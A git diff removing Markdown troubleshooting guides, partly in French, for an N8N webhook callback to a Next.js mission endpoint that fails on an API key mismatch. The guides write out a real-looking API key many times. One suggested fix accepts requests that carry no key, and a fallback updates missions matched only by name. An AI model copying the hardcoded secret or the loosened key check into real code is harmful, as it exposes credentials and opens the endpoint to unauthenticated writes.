- -### Step 2: Check N8N Workflow Configuration - -**Verify N8N workflow has "Save Mission To API" node**: -- Node should POST to: `{{ MISSION_API_URL }}/mission-created` -- Should include `missionId` in body -- Should include `x-api-key` header -- Should include integration IDs in body - -**Expected format**: -```json -{ - "missionId": "uuid-here", - "name": "Mission Name", - "creatorId": "user-id", - "gitRepoUrl": "https://gite.slm-lab.net/alma/repo-name", - "leantimeProjectId": "123", - "documentationCollectionId": "collection-id", - "rocketchatChannelId": "channel-id" -} -``` - -### Step 3: Check Server Logs - -**Look for**: -``` -Mission Created Webhook Received -Received mission-created data: { ... } -Found mission: { id: "...", name: "..." } -Updating giteaRepositoryUrl: ... -Mission updated successfully -``` - -**If missing**: N8N is not calling the endpoint. - -### Step 4: Test N8N Callback Manually - -**Send test request**: -```bash -curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: YOUR_N8N_API_KEY" \ - -d '{ - "missionId": "existing-mission-id", - "gitRepoUrl": "https://gite.slm-lab.net/alma/test-repo", - "leantimeProjectId": "999", - "documentationCollectionId": "test-collection", - "rocketchatChannelId": "test-channel" - }' -``` - -**Expected**: 200 OK with updated mission data. - ---- - -## 🔧 Solutions - -### Solution 1: Verify N8N Workflow Configuration (IMMEDIATE) - -**Check N8N workflow "Save Mission To API" node**: - -1. **URL should be**: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/mission-created - ``` - Or hardcoded: - ``` - https://hub.slm-lab.net/api/missions/mission-created - ``` - -2. **Headers should include**: - ``` - Content-Type: application/json - x-api-key: {{ $node['Process Mission Data'].json.config.N8N_API_KEY }} - ``` - -3. **Body should include**: - - ✅ `missionId` (from original request) - - ✅ `gitRepoUrl` (from Git repository creation) - - ✅ `leantimeProjectId` (from Leantime project creation) - - ✅ `documentationCollectionId` (from Outline collection creation) - - ✅ `rocketchatChannelId` (from RocketChat channel creation) - -4. 
**Verify node execution**: - - Check N8N execution logs - - Verify node is not set to "continueOnFail" - - Check for errors in node execution - -### Solution 2: Add Logging to Track Callback (DEBUGGING) - -**Add more detailed logging** in `app/api/missions/mission-created/route.ts`: - -```typescript -logger.debug('Mission Created Webhook Received', { - headers: { - hasApiKey: !!request.headers.get('x-api-key'), - contentType: request.headers.get('content-type') - } -}); - -const body = await request.json(); -logger.debug('Received mission-created data', { - missionId: body.missionId, - name: body.name, - creatorId: body.creatorId, - hasGitRepoUrl: !!body.gitRepoUrl, - hasLeantimeProjectId: !!body.leantimeProjectId, - hasDocumentationCollectionId: !!body.documentationCollectionId, - hasRocketchatChannelId: !!body.rocketchatChannelId, - fullBody: body // Log full body for debugging -}); -``` - -### Solution 3: Add Fallback Lookup (ROBUSTNESS) - -**Improve mission lookup** in `app/api/missions/mission-created/route.ts`: - -```typescript -// Try missionId first -if (body.missionId) { - mission = await prisma.mission.findUnique({ - where: { id: body.missionId } - }); - - if (!mission) { - logger.warn('Mission not found by ID, trying name + creatorId', { - missionId: body.missionId - }); - } -} - -// Fallback to name + creatorId -if (!mission && body.name && body.creatorId) { - mission = await prisma.mission.findFirst({ - where: { - name: body.name, - creatorId: body.creatorId - }, - orderBy: { createdAt: 'desc' } - }); -} - -// If still not found, try just by name (last resort) -if (!mission && body.name) { - logger.warn('Mission not found by name + creatorId, trying just name', { - name: body.name, - creatorId: body.creatorId - }); - mission = await prisma.mission.findFirst({ - where: { name: body.name }, - orderBy: { createdAt: 'desc' } - }); -} -``` - -### Solution 4: Add Retry Mechanism (RELIABILITY) - -**Add retry logic** for N8N callback (if N8N supports it): - -- Configure N8N to retry failed callbacks -- Or implement a webhook retry queue - -### Solution 5: Manual ID Update Script (MIGRATION) - -**Create a script** to manually update existing missions: - -```typescript -// scripts/update-mission-ids.ts -import { prisma } from '@/lib/prisma'; - -async function updateMissionIds() { - // Get missions without IDs - const missions = await prisma.mission.findMany({ - where: { - OR: [ - { giteaRepositoryUrl: null }, - { leantimeProjectId: null }, - { outlineCollectionId: null }, - { rocketChatChannelId: null } - ] - } - }); - - for (const mission of missions) { - // Manually update IDs if you know them - // Or query external services to find them - await prisma.mission.update({ - where: { id: mission.id }, - data: { - giteaRepositoryUrl: '...', // From Gitea - leantimeProjectId: '...', // From Leantime - outlineCollectionId: '...', // From Outline - rocketChatChannelId: '...' // From RocketChat - } - }); - } -} -``` - ---- - -## 🧪 Testing Plan - -### Test 1: Create Mission and Verify IDs Saved - -1. Create a new mission via frontend -2. Wait 30-60 seconds for N8N to complete -3. Query database to verify IDs are saved: - ```sql - SELECT * FROM "Mission" WHERE name = 'Test Mission'; - ``` -4. **Expected**: All integration IDs should be populated - -### Test 2: Check N8N Execution Logs - -1. Go to N8N execution history -2. Find the latest mission creation execution -3. 
Check "Save Mission To API" node: - - ✅ Node executed successfully - - ✅ Response is 200 OK - - ✅ Body contains integration IDs - -### Test 3: Test Deletion with IDs - -1. Delete a mission that has IDs saved -2. Check N8N deletion workflow execution -3. **Expected**: N8N should receive non-empty IDs and successfully delete integrations - -### Test 4: Test Deletion without IDs - -1. Delete a mission that has NULL IDs -2. Check N8N deletion workflow execution -3. **Expected**: N8N receives empty IDs and logs warning (but mission still deleted) - ---- - -## 📊 Expected vs Actual Behavior - -### Expected Behavior - -**Mission Creation**: -1. Mission created in database -2. N8N workflow triggered -3. N8N creates integrations -4. N8N calls `/mission-created` with IDs -5. IDs saved to database ✅ - -**Mission Deletion**: -1. Mission fetched from database (with IDs) ✅ -2. IDs sent to N8N deletion workflow ✅ -3. N8N deletes integrations ✅ -4. Mission deleted from database ✅ - -### Actual Behavior (Current Issue) - -**Mission Creation**: -1. Mission created in database ✅ -2. N8N workflow triggered ✅ -3. N8N creates integrations ✅ -4. N8N calls `/mission-created` ❓ (May fail) -5. IDs saved to database ❌ (If step 4 fails) - -**Mission Deletion**: -1. Mission fetched from database (IDs are NULL) ❌ -2. Empty IDs sent to N8N deletion workflow ❌ -3. N8N cannot delete integrations ❌ -4. Mission deleted from database ✅ (But integrations remain) - ---- - -## 🎯 Immediate Action Items - -1. **✅ Verify N8N Workflow Configuration** - - Check "Save Mission To API" node exists - - Verify URL, headers, and body format - - Check execution logs for errors - -2. **✅ Check Server Logs** - - Look for `/mission-created` endpoint calls - - Check for errors or missing API key - - Verify mission lookup is working - -3. **✅ Test Manually** - - Create a test mission - - Wait for N8N to complete - - Check database for IDs - - If missing, manually test the callback endpoint - -4. **✅ Fix N8N Workflow (if needed)** - - Ensure `missionId` is included in callback - - Verify all integration IDs are included - - Test the workflow end-to-end - -5. **✅ Update Existing Missions (if needed)** - - Manually update IDs for critical missions - - Or create migration script - ---- - -## 📝 Code Changes Needed - -### No Code Changes Required (if N8N is configured correctly) - -The endpoint `/api/missions/mission-created` already exists and should work. The issue is likely: -- N8N workflow not calling it -- N8N workflow calling it incorrectly -- Network/authentication issues - -### Optional Improvements - -1. **Better error handling** in `/mission-created` endpoint -2. **Retry mechanism** for failed callbacks -3. **Monitoring/alerting** when IDs are not saved -4. 
**Migration script** for existing missions

---

## 🔍 Debugging Commands

Note that the camelCase identifiers are double-quoted below; Prisma creates them as quoted (case-sensitive) columns, so unquoted names would be folded to lowercase by Postgres and fail.

### Check Recent Missions Without IDs

```sql
SELECT
  id,
  name,
  "createdAt",
  CASE WHEN "giteaRepositoryUrl" IS NULL THEN 'MISSING' ELSE 'OK' END as gitea,
  CASE WHEN "leantimeProjectId" IS NULL THEN 'MISSING' ELSE 'OK' END as leantime,
  CASE WHEN "outlineCollectionId" IS NULL THEN 'MISSING' ELSE 'OK' END as outline,
  CASE WHEN "rocketChatChannelId" IS NULL THEN 'MISSING' ELSE 'OK' END as rocketchat
FROM "Mission"
WHERE "createdAt" > NOW() - INTERVAL '7 days'
ORDER BY "createdAt" DESC;
```

### Check Mission with IDs

```sql
SELECT
  id,
  name,
  "giteaRepositoryUrl",
  "leantimeProjectId",
  "outlineCollectionId",
  "rocketChatChannelId"
FROM "Mission"
WHERE id = 'your-mission-id';
```

### Test Callback Endpoint

```bash
# Replace with actual values
curl -X POST https://hub.slm-lab.net/api/missions/mission-created \
  -H "Content-Type: application/json" \
  -H "x-api-key: YOUR_N8N_API_KEY" \
  -d '{
    "missionId": "mission-uuid-here",
    "gitRepoUrl": "https://gite.slm-lab.net/alma/test",
    "leantimeProjectId": "123",
    "documentationCollectionId": "collection-456",
    "rocketchatChannelId": "channel-789"
  }'
```

---

## ✅ Conclusion

**Root Cause**: N8N workflow is likely not calling the `/api/missions/mission-created` endpoint, or the callback is failing silently.

**Solution**:
1. Verify N8N workflow configuration
2. Check N8N execution logs
3. Test callback endpoint manually
4. Fix N8N workflow if needed
5. Manually update existing missions if necessary

**Status**: Endpoint exists and should work. Issue is in N8N workflow configuration or execution.

---

**Document Created**: $(date)
**Last Updated**: $(date)
**Priority**: HIGH - Blocks proper mission deletion

diff --git a/N8N_API_KEY_MISMATCH_FIX.md b/N8N_API_KEY_MISMATCH_FIX.md deleted file mode 100644 index d63e8a2..0000000 --- a/N8N_API_KEY_MISMATCH_FIX.md +++ /dev/null @@ -1,260 +0,0 @@ -# N8N API Key Mismatch - 401 Unauthorized

## 🔍 Problem Identified

**Error**: `401 - "Unauthorized"`
**Log**: `Invalid API key { received: 'present', expected: 'configured' }`

**Status**:
- ✅ Endpoint is being called (`Mission Created Webhook Received`)
- ✅ API key is being sent (`received: 'present'`)
- ❌ **API key values don't match**

---

## 🔍 Root Cause

The API key sent by N8N in the `x-api-key` header **does not match** the `N8N_API_KEY` environment variable on the server.

### How It Works

1. **Server sends to N8N** (line 420 in `app/api/missions/route.ts`):
   ```typescript
   config: {
     N8N_API_KEY: process.env.N8N_API_KEY, // From server environment
     MISSION_API_URL: process.env.NEXT_PUBLIC_API_URL
   }
   ```

2. **N8N uses this value** in "Save Mission To API" node:
   ```
   x-api-key: {{ $node['Process Mission Data'].json.config.N8N_API_KEY }}
   ```

3. 
**Server receives and validates** (line 42 in `app/api/missions/mission-created/route.ts`): - ```typescript - if (apiKey !== expectedApiKey) { - // Keys don't match → 401 error - } - ``` - -### The Problem - -**If `process.env.N8N_API_KEY` is `undefined` or empty** when sending to N8N: -- N8N receives `undefined` or empty string -- N8N sends empty string in header -- Server expects the actual key value -- **Keys don't match → 401 error** - ---- - -## ✅ Solution - -### Step 1: Verify N8N_API_KEY is Set - -**Check your environment variables**: - -```bash -# In your terminal (if running locally) -echo $N8N_API_KEY - -# Or check in your application -# Create a test endpoint to verify -``` - -**Expected**: Should show the actual API key value (not empty) - -### Step 2: Ensure Same Key in Both Places - -**The key must be the same in**: - -1. **Server environment variable**: `N8N_API_KEY=your-key-here` -2. **N8N workflow config**: The value sent in `config.N8N_API_KEY` - -**If they're different**, they won't match! - -### Step 3: Check What N8N is Sending - -**In N8N workflow "Save Mission To API" node**, verify: - -1. **Header `x-api-key` value**: - ``` - {{ $node['Process Mission Data'].json.config.N8N_API_KEY }} - ``` - -2. **What this resolves to**: - - If `config.N8N_API_KEY` is `undefined` → N8N sends empty string - - If `config.N8N_API_KEY` has a value → N8N sends that value - -3. **Check N8N execution logs**: - - Look at the actual request being sent - - Check the `x-api-key` header value - - Compare with your server's `N8N_API_KEY` - -### Step 4: Fix the Mismatch - -**Option A: If server's N8N_API_KEY is undefined** - -Add to `.env.local` (or production environment): -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -Restart the application. - -**Option B: If N8N is sending wrong value** - -Check what value N8N has in `config.N8N_API_KEY`: -- It should match the server's `N8N_API_KEY` -- If different, update one to match the other - -**Option C: Hardcode in N8N (not recommended)** - -If you can't sync the values, you could hardcode in N8N: -``` -x-api-key: LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -But this is less secure - better to use environment variable. - ---- - -## 🧪 Testing - -### Test 1: Check Server Environment - -**Create test endpoint**: -```typescript -// app/api/test-n8n-key/route.ts -import { NextResponse } from 'next/server'; - -export async function GET() { - return NextResponse.json({ - hasN8NApiKey: !!process.env.N8N_API_KEY, - keyLength: process.env.N8N_API_KEY?.length || 0, - keyPrefix: process.env.N8N_API_KEY ? process.env.N8N_API_KEY.substring(0, 4) + '...' : 'none' - }); -} -``` - -**Visit**: `http://localhost:3000/api/test-n8n-key` - -**Expected**: -```json -{ - "hasN8NApiKey": true, - "keyLength": 32, - "keyPrefix": "Lwge..." -} -``` - -### Test 2: Check What N8N Sends - -**In N8N execution logs**, check the "Save Mission To API" node: -- Look at the request headers -- Find `x-api-key` header -- Note the value - -**Compare** with server's `N8N_API_KEY` - they must match exactly. 
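If the values look identical but validation still fails, invisible whitespace is a common culprit. A small comparison helper along these lines (a sketch, not the current implementation; the route today uses a plain `!==`) trims both sides and compares in constant time:

```typescript
// Hypothetical helper -- the route currently compares with a plain `!==`.
import { timingSafeEqual } from 'crypto';

function apiKeysMatch(received: string | null, expected: string | undefined): boolean {
  if (!received || !expected) return false;

  // Trim to catch the "extra spaces or newline" mismatch described above
  const a = Buffer.from(received.trim());
  const b = Buffer.from(expected.trim());

  // timingSafeEqual throws on length mismatch, so compare lengths first
  return a.length === b.length && timingSafeEqual(a, b);
}
```

Using it in the webhook route would mean replacing `apiKey !== expectedApiKey` with `!apiKeysMatch(apiKey, expectedApiKey)`.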
- -### Test 3: Manual Test - -**Test the endpoint with the correct key**: -```bash -curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" \ - -d '{ - "missionId": "test-id", - "name": "Test", - "creatorId": "user-id" - }' -``` - -**Expected**: 200 OK (if mission exists) or 404 (if mission doesn't exist) - -**If 401**: The key in the curl command doesn't match server's `N8N_API_KEY` - ---- - -## 🔧 Common Issues - -### Issue 1: Key is undefined when sending to N8N - -**Symptom**: N8N receives `undefined` or empty string in `config.N8N_API_KEY` - -**Cause**: `process.env.N8N_API_KEY` is not set when creating mission - -**Fix**: Add `N8N_API_KEY` to environment and restart - -### Issue 2: Different keys in different environments - -**Symptom**: Works in development but not production (or vice versa) - -**Cause**: Different `N8N_API_KEY` values in different environments - -**Fix**: Use the same key in all environments, or update N8N to use environment-specific keys - -### Issue 3: Key has extra spaces or characters - -**Symptom**: Keys look the same but don't match - -**Cause**: Extra spaces, newlines, or special characters - -**Fix**: -```env -# Correct -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 - -# Wrong (with quotes) -N8N_API_KEY="LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" - -# Wrong (with spaces) -N8N_API_KEY = LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - ---- - -## 📋 Debugging Checklist - -- [ ] `N8N_API_KEY` is set in server environment -- [ ] Key value matches what N8N is sending -- [ ] No extra spaces or characters in key -- [ ] Server has been restarted after adding key -- [ ] Test endpoint shows key is loaded -- [ ] N8N execution logs show correct key in header -- [ ] Manual curl test works with the key - ---- - -## 🎯 Expected Flow After Fix - -1. **Mission created** ✅ -2. **N8N workflow triggered** ✅ -3. **Server sends `config.N8N_API_KEY` to N8N** ✅ -4. **N8N creates integrations** ✅ -5. **N8N calls `/api/missions/mission-created`** ✅ -6. **N8N sends `x-api-key` header with same value** ✅ -7. **Server validates key matches** ✅ -8. **IDs saved to database** ✅ - ---- - -## 📝 Summary - -**Problem**: 401 Unauthorized - API key mismatch - -**Root Cause**: The API key sent by N8N doesn't match the server's `N8N_API_KEY` - -**Solution**: -1. Ensure `N8N_API_KEY` is set in server environment -2. Ensure N8N uses the same key value -3. Verify keys match exactly (no spaces, same value) - -**After Fix**: The endpoint should return 200 OK and save integration IDs. - ---- - -**Document Created**: $(date) -**Priority**: CRITICAL - Blocks integration IDs from being saved - diff --git a/N8N_API_KEY_MISSING_FIX.md b/N8N_API_KEY_MISSING_FIX.md deleted file mode 100644 index 74b8732..0000000 --- a/N8N_API_KEY_MISSING_FIX.md +++ /dev/null @@ -1,245 +0,0 @@ -# N8N_API_KEY Missing - Server Configuration Error - -## 🔍 Problem Identified - -**Error**: `500 - "Server configuration error"` - -**Cause**: `N8N_API_KEY` is **NOT set** in the server's environment variables. - ---- - -## ✅ Solution: Add N8N_API_KEY to Environment Variables - -### The Error - -Looking at `app/api/missions/mission-created/route.ts` (lines 34-39): - -```typescript -if (!expectedApiKey) { - logger.error('N8N_API_KEY not configured in environment'); - return NextResponse.json( - { error: 'Server configuration error' }, - { status: 500 } - ); -} -``` - -**This error means**: `process.env.N8N_API_KEY` is `undefined` or empty. 
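One way to surface this earlier than at request time is a fail-fast check in a module imported at startup. A sketch, assuming a hypothetical `lib/env.ts`:

```typescript
// lib/env.ts -- hypothetical startup check, not part of the current codebase.
// Throws at boot instead of returning 500 on the first N8N callback.
function requireEnv(name: string): string {
  const value = process.env[name];
  if (!value || value.trim() === '') {
    throw new Error(`Missing required environment variable: ${name}`);
  }
  return value;
}

export const N8N_API_KEY = requireEnv('N8N_API_KEY');
```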
- ---- - -## 🔧 How to Fix - -### Step 1: Determine Your Environment - -**Are you running**: -- Local development? -- Production server? -- Docker container? -- Vercel/other hosting? - -### Step 2: Add N8N_API_KEY - -#### Option A: Local Development (`.env.local`) - -**Create or edit `.env.local` file** in your project root: - -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**Then restart your development server**: -```bash -# Stop the server (Ctrl+C) -# Restart -npm run dev -# or -yarn dev -``` - -#### Option B: Production Server - -**If using Docker**: -Add to `docker-compose.yml`: -```yaml -services: - app: - environment: - - N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**Or in `.env` file** (if using docker-compose with env_file): -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**If using CapRover**: -1. Go to App Settings -2. App Configs → Environment Variables -3. Add: `N8N_API_KEY` = `LwgeE1ntADD20OuWC88S3pR0EaO7FtO4` -4. Save and restart the app - -**If using Vercel**: -1. Go to Project Settings -2. Environment Variables -3. Add: `N8N_API_KEY` = `LwgeE1ntADD20OuWC88S3pR0EaO7FtO4` -4. Redeploy - -**If using other hosting**: -- Add `N8N_API_KEY` to your hosting platform's environment variables -- Restart/redeploy the application - ---- - -## 🧪 Verification - -### Step 1: Check if Variable is Set - -**Create a test endpoint** to verify: - -```typescript -// app/api/test-env/route.ts -import { NextResponse } from 'next/server'; - -export async function GET() { - return NextResponse.json({ - hasN8NApiKey: !!process.env.N8N_API_KEY, - n8nApiKeyLength: process.env.N8N_API_KEY?.length || 0, - // Don't expose the actual key! - }); -} -``` - -**Then visit**: `http://localhost:3000/api/test-env` (or your production URL) - -**Expected**: -```json -{ - "hasN8NApiKey": true, - "n8nApiKeyLength": 32 -} -``` - -### Step 2: Test the Endpoint Manually - -**After adding the variable and restarting**: - -```bash -curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: LwgeE1ntADD20OuWC88S3pR0EaO7FtO4" \ - -d '{ - "missionId": "test-mission-id", - "name": "Test Mission", - "creatorId": "test-user-id" - }' -``` - -**Expected**: -- ✅ **200 OK** with JSON response (if mission exists) -- ❌ **500 error** if `N8N_API_KEY` is still not set -- ❌ **401 error** if API key doesn't match - -### Step 3: Check Server Logs - -**After adding the variable**, check your server logs. You should **NOT** see: -``` -N8N_API_KEY not configured in environment -``` - -**You SHOULD see** (when endpoint is called): -``` -Mission Created Webhook Received -Received mission-created data: { ... } -``` - ---- - -## 🔍 Troubleshooting - -### Issue 1: Variable Not Loading - -**Symptom**: Still getting 500 error after adding variable - -**Possible causes**: -1. **Wrong file**: Using `.env` instead of `.env.local` (Next.js prefers `.env.local`) -2. **Not restarted**: Server needs restart after adding env variable -3. **Wrong location**: `.env.local` must be in project root (same level as `package.json`) -4. 
**Syntax error**: Check for quotes, spaces, or special characters

**Fix**:
```env
# Correct
N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4

# Wrong (with quotes)
N8N_API_KEY="LwgeE1ntADD20OuWC88S3pR0EaO7FtO4"

# Wrong (with spaces)
N8N_API_KEY = LwgeE1ntADD20OuWC88S3pR0EaO7FtO4
```

### Issue 2: Different Key in N8N

**Symptom**: 401 Unauthorized error

**Cause**: The API key in the N8N workflow doesn't match the one in the environment

**Fix**:
- Use the same key in both places
- Or update the N8N workflow to use the key from the environment

### Issue 3: Production vs Development

**Symptom**: Works locally but not in production

**Cause**: Environment variable only set in development

**Fix**: Add the variable to the production environment as well

---

## 📋 Complete Checklist

- [ ] `N8N_API_KEY` added to `.env.local` (development) or production environment
- [ ] Variable has correct value (no quotes, no spaces)
- [ ] Application restarted after adding variable
- [ ] Test endpoint shows `hasN8NApiKey: true`
- [ ] Manual curl test returns 200 (not 500)
- [ ] Server logs show "Mission Created Webhook Received" (not "N8N_API_KEY not configured")
- [ ] N8N workflow uses same API key in header

---

## 🎯 Expected Flow After Fix

1. **Mission created** ✅
2. **N8N workflow triggered** ✅
3. **N8N creates integrations** ✅
4. **N8N calls `/api/missions/mission-created`** ✅
5. **Endpoint receives request** ✅
6. **API key validated** ✅
7. **IDs saved to database** ✅
8. **Mission has integration IDs** ✅

---

## 📝 Summary

**Problem**: 500 "Server configuration error"

**Root Cause**: `N8N_API_KEY` environment variable is not set

**Solution**:
1. Add `N8N_API_KEY` to environment variables
2. Use the same key value that N8N is sending in the `x-api-key` header
3. Restart the application
4. Test the endpoint

**After Fix**: The endpoint should return 200 OK and save integration IDs to the database.

---

**Document Created**: $(date)
**Priority**: CRITICAL - Blocks integration IDs from being saved

diff --git a/N8N_API_KEY_SOLUTION.md b/N8N_API_KEY_SOLUTION.md deleted file mode 100644 index b61b23d..0000000 --- a/N8N_API_KEY_SOLUTION.md +++ /dev/null @@ -1,170 +0,0 @@ -# Solution: N8N API Key Mismatch

## 🔍 Problem

**Before**: You could create missions without `N8N_API_KEY`
- Mission created ✅
- N8N callback failed silently ❌
- Mission remained in the database without IDs ❌

**Now**: With `N8N_API_KEY` added
- Mission created ✅
- N8N callback called ✅
- **But the API key doesn't match → 401 → mission creation fails** ❌

---

## ✅ Solution 1: Use the Same Key (RECOMMENDED)

### Step 1: Find the Key Generated by N8N

**In N8N**:
1. Open your workflow settings
2. Find the API key that N8N uses
3. Or check the N8N execution logs to see which key is being sent

### Step 2: Use This Key on the Server

**Add the same key to your environment**:

```env
N8N_API_KEY=the-key-generated-by-n8n
```

**Important**: Use **exactly the same key** as the one generated by N8N.
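To confirm that both sides really hold the same value without ever printing the secret, you can compare short fingerprints instead. A throwaway sketch (the file name and the `tsx` runner are assumptions):

```typescript
// compare-key.ts -- hypothetical one-off check; prints a fingerprint, never the key itself
import { createHash } from 'crypto';

const key = (process.env.N8N_API_KEY ?? '').trim();
const fingerprint = createHash('sha256').update(key).digest('hex').slice(0, 12);

console.log(key ? `N8N_API_KEY fingerprint: ${fingerprint}` : 'N8N_API_KEY is not set');
```

Run it on the server (e.g. `npx tsx compare-key.ts`), hash the key N8N shows the same way, and compare the two fingerprints.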
- -### Étape 3: Redémarrer le Serveur - -```bash -# Redémarrer l'application -npm run dev -# ou -yarn dev -``` - ---- - -## ✅ Solution 2: Rendre la Vérification Plus Flexible (TEMPORAIRE) - -Si vous voulez permettre la création de mission même si les clés ne correspondent pas : - -**Modifier `app/api/missions/mission-created/route.ts`** : - -```typescript -// Vérifier l'API key -const apiKey = request.headers.get('x-api-key'); -const expectedApiKey = process.env.N8N_API_KEY; - -// Si pas de clé configurée, accepter (mais logger un warning) -if (!expectedApiKey) { - logger.warn('N8N_API_KEY not configured, accepting request without validation'); - // Continue without validation -} else if (apiKey && apiKey !== expectedApiKey) { - logger.error('Invalid API key', { - received: apiKey ? 'present' : 'missing', - expected: expectedApiKey ? 'configured' : 'missing' - }); - return NextResponse.json( - { error: 'Unauthorized' }, - { status: 401 } - ); -} else if (!apiKey && expectedApiKey) { - logger.warn('API key expected but not provided, accepting anyway'); - // Continue without validation (less secure but works) -} -``` - -**⚠️ Note** : Cette solution est moins sécurisée mais permet de continuer à fonctionner. - ---- - -## ✅ Solution 3: Utiliser la Clé du Serveur dans N8N - -**Au lieu d'utiliser la clé générée par N8N**, utilisez celle du serveur : - -### Dans N8N "Save Mission To API" Node - -**Header `x-api-key`** : -``` -{{ $node['Process Mission Data'].json.config.N8N_API_KEY }} -``` - -**Cette valeur vient de** : -- `config.N8N_API_KEY` envoyé par le serveur (ligne 420) -- Qui vient de `process.env.N8N_API_KEY` - -**Donc** : Si vous mettez la même clé dans `process.env.N8N_API_KEY`, N8N l'utilisera automatiquement. - ---- - -## 🎯 Solution Recommandée - -**Utiliser la clé générée par N8N dans l'environnement du serveur** : - -1. **Copier la clé générée par N8N** -2. **L'ajouter dans `.env.local`** (ou variables d'environnement production) : - ```env - N8N_API_KEY=votre-cle-generee-par-n8n - ``` -3. **Redémarrer le serveur** -4. **Tester la création de mission** - -**Avantage** : -- ✅ Sécurisé (vérification de clé) -- ✅ Fonctionne correctement -- ✅ IDs sauvegardés - ---- - -## 🔍 Comment Trouver la Clé N8N - -### Option 1: Dans N8N Workflow - -1. Ouvrez le workflow N8N -2. Regardez le node "Save Mission To API" -3. Vérifiez la valeur de `x-api-key` header -4. Ou regardez dans `config.N8N_API_KEY` dans "Process Mission Data" - -### Option 2: Dans N8N Execution Logs - -1. Allez dans N8N → Executions -2. Trouvez une exécution récente -3. Regardez le node "Save Mission To API" -4. Vérifiez les headers de la requête -5. Trouvez la valeur de `x-api-key` - -### Option 3: Générer une Nouvelle Clé - -**Si vous ne trouvez pas la clé**, vous pouvez : -1. Générer une nouvelle clé (ex: `openssl rand -hex 16`) -2. L'ajouter dans l'environnement du serveur -3. L'utiliser dans N8N workflow (hardcoder temporairement) - ---- - -## 📋 Checklist - -- [ ] Trouver la clé API générée par N8N -- [ ] Ajouter cette clé dans `N8N_API_KEY` environnement serveur -- [ ] Vérifier que N8N utilise `{{ $node['Process Mission Data'].json.config.N8N_API_KEY }}` -- [ ] Redémarrer le serveur -- [ ] Tester création de mission -- [ ] Vérifier que les IDs sont sauvegardés - ---- - -## 🎯 Résumé - -**Problème** : Clé API N8N ≠ Clé API serveur → 401 Unauthorized - -**Solution** : Utiliser la **même clé** dans les deux endroits : -1. Environnement serveur : `N8N_API_KEY=cle-commune` -2. 
N8N workflow : Utilise automatiquement via `config.N8N_API_KEY` - -**Après fix** : Mission création fonctionne et IDs sont sauvegardés ✅ - ---- - -**Document Created**: $(date) -**Priority**: HIGH - Blocks mission creation - diff --git a/N8N_CONFIGURATION_FIX.md b/N8N_CONFIGURATION_FIX.md deleted file mode 100644 index 9142500..0000000 --- a/N8N_CONFIGURATION_FIX.md +++ /dev/null @@ -1,292 +0,0 @@ -# N8N Configuration Fix - Environment Variables & Webhook Activation - -## 🔍 Problems Identified - -Based on your error logs, there are **THREE critical issues**: - -1. ❌ **N8N_API_KEY is not set in environment variables** -2. ❌ **404 Error**: Webhook "mission-created" is not registered (workflow not active) -3. ❌ **500 Error**: "Error in workflow" (workflow is running but failing) - ---- - -## ✅ Fix 1: Set N8N_API_KEY Environment Variable - -### Problem -``` -N8N_API_KEY is not set in environment variables -``` - -### Solution - -**Add to your `.env` or `.env.local` file**: - -```env -N8N_API_KEY=LwgeE1ntADD20OuWC88S3pR0EaO7FtO4 -``` - -**Or if using a different key**, use your actual N8N API key. - -### Where to Add - -1. **Local Development** (`.env.local`): - ```env - N8N_API_KEY=your-actual-api-key-here - ``` - -2. **Production** (environment variables in your hosting platform): - - Vercel: Settings → Environment Variables - - Docker: `docker-compose.yml` or `.env` file - - CapRover: App Settings → App Configs → Environment Variables - -### Verify It's Set - -After adding, restart your application and check logs. You should **NOT** see: -``` -N8N_API_KEY is not set in environment variables -``` - ---- - -## ✅ Fix 2: Activate N8N Workflow - -### Problem -``` -404 Error: The requested webhook "mission-created" is not registered. -Hint: Click the 'Execute workflow' button on the canvas, then try again. -``` - -### Solution - -**In N8N Interface**: - -1. **Open your workflow** in N8N (the one with the webhook node) -2. **Click "Active" toggle** in the top right to activate the workflow - - The toggle should be **GREEN/ON** ✅ - - If it's gray/off, click it to activate - -3. **Verify the webhook node**: - - The webhook node should show as "Active" - - The webhook path should be: `mission-created` - - The full URL should be: `https://brain.slm-lab.net/webhook/mission-created` - -### Alternative: Test Mode - -If you're testing: -1. Click **"Execute Workflow"** button on the canvas -2. This activates the webhook for **one test call** -3. After the test, activate the workflow permanently - -### Verify Webhook is Active - -**Test the webhook URL**: -```bash -curl -X POST https://brain.slm-lab.net/webhook/mission-created \ - -H "Content-Type: application/json" \ - -d '{"test": "data"}' -``` - -**Expected**: -- If active: Should trigger the workflow (may return error if data is invalid, but should not be 404) -- If not active: Returns 404 with message about webhook not registered - ---- - -## ✅ Fix 3: Fix Workflow Errors (500 Error) - -### Problem -``` -500 Error: {"message":"Error in workflow"} -``` - -This means the workflow is running but encountering an error. Common causes: - -### Common Issues & Fixes - -#### Issue 3.1: Missing missionId in Process Mission Data - -**Check**: The "Process Mission Data" node should include `missionId` in its output. 
